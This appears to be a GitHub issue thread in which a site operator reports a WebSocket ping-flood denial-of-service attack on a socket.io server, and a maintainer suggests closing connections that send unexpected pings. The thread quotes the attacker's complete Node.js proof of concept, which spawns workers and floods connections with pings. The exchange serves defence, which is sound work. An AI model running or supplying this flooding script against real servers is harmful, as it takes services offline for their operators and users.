DOS Attack on our WS server, potential vulnerability?

[FabianB12]

Hey, my & a few other websites has been hit by the following attack over the last few days. We've managed to retrieve the PoC from the person doing the attack & it's basically a ping flooding attack.

What's happening?

The attacker is using a pretty simple but effective method:

• Spins up 5 workers
• Each worker spams new WebSocket connections every 350ms
• Once connected, floods each connection with pings (like, a lot of pings 😅)
• Keeps connections alive with heartbeats

After a little bit, the WS server just dies. The obvious solution seems to be rate limiting pings per IP address, but that wasn't as straight forward as I had hoped (because the events for pings are not emitted in the same way as other pings).

Is this considered a socket.io vulnerability? Or is this considered a regular DOS attack?
What's the "correct" way to mitigate this?

The PoC we retrieved from the attacker:

const { Worker, isMainThread, parentPort } = require("worker_threads");

const WebSocket = require("ws");

if (isMainThread) {
  for (let i = 0; i < 5; i++) {
    const worker = new Worker(__filename);
    worker.on("message", (message) =>
      console.log("Worker message:", message)
    );
    worker.on("error", (error) => console.error("Worker error:", error));
    worker.on("exit", (exitCode) =>
      console.log(`Worker stopped with exit code ${exitCode}`)
    );
  }
} else {
  console.log(`[Worker ${process.pid}] Worker started`);

  function conn() {
    const connId = Date.now();
    console.log(`[Worker ${process.pid}] Creating connection #${connId}`);
    
    const ws = new WebSocket(
      "wss://api.example.com:8443/socket.io/?EIO=4&transport=websocket",
      {
        headers: {
          "accept-encoding": "gzip, deflate, br, zstd",
          "accept-language": "en-US,en;q=0.9",
          "cache-control": "no-cache",
          connection: "Upgrade",
          host: "api.example.com",
          origin: "https://example.com",
          pragma: "no-cache",
          "sec-websocket-extensions":
                        "permessage-deflate; client_max_window_bits",
          "sec-websocket-key": "XWCz1+3Xh0Gd8c8f3biBoHSNUZg=",
          "sec-websocket-version": "13",
          upgrade: "websocket",
          "user-agent":
                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0",
        },
      }
    );

    ws.on("open", () => {
      console.log(`[Worker ${process.pid}] Connection #${connId} established`);
      
      setInterval(() => {
        ws.send("3");
      }, 2000);
      
      for (let i = 0; i < 9; i++) {
        setInterval(() => {
          ws.ping();
          ws.ping();
          ws.ping();
          ws.ping();
          ws.ping();
          ws.ping();
          ws.ping();
          ws.ping();
          ws.ping();
        });
      }
    });

    ws.on("message", (data) => {
      console.log("Received:", data.toString());
      parentPort.postMessage(data.toString());
    });

    ws.on("close", () => {
      console.log(`[Worker ${process.pid}] Connection #${connId} closed`);
    });

    ws.on("error", (err) => {
      console.error(`[Worker ${process.pid}] Error on connection #${connId}:`, err.message);
    });
  }

  setInterval(conn, 350);
}```

[darrachequesne]

Hi! Yes, I'd say that counts as a regular DOS attack.

You could catch the 'ping' messages in your application and close the connection:

function listenToPing(socket) {
  socket.on("ping", () => {
    console.warn("unexpected ping");
    socket.close();
  });
}

io.engine.on("connection", (engineSocket) => {
  if (engineSocket.transport.name === "websocket") {
    listenToPing(engineSocket.transport.socket);
  } else {
    engineSocket.on("upgrade", (transport) => {
      if (transport.name === "websocket") {
        listenToPing(transport.socket);
      }
    })
  }
});

I'm wondering whether we should include it in the library, as receiving ping / pong events is not really expected. Thoughts?